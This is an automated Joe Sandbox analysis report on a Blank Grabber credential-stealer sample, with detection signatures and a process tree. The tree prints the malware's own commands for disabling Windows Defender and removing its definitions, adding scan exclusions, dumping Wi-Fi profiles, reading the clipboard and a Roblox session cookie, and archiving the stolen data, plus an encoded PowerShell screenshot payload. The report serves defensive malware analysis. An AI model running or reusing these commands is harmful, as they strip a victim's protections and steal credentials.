Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe

Overview

General Information

Sample name:SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Analysis ID:1446241
MD5:030c3c535b2d8f10ceaeede6e3fe23f2
SHA1:032ef2c8e717960d9b49dd7e48e4fc761cb4cfed
SHA256:e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d
Tags:exe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe" MD5: 030C3C535B2D8F10CEAEEDE6E3FE23F2)
    • SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe" MD5: 030C3C535B2D8F10CEAEEDE6E3FE23F2)
      • cmd.exe (PID: 7708 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7864 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7840 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 4568 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7888 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3848 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5276 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5632 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8204 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8272 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8324 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8224 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 8308 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8280 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8424 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8788 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8936 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 9028 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8584 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8732 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8592 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8752 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8868 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8920 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8944 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9008 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9044 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9104 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9124 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1212 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1992 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3124 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8404 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4536 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8296 cmdline: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8316 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3716 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
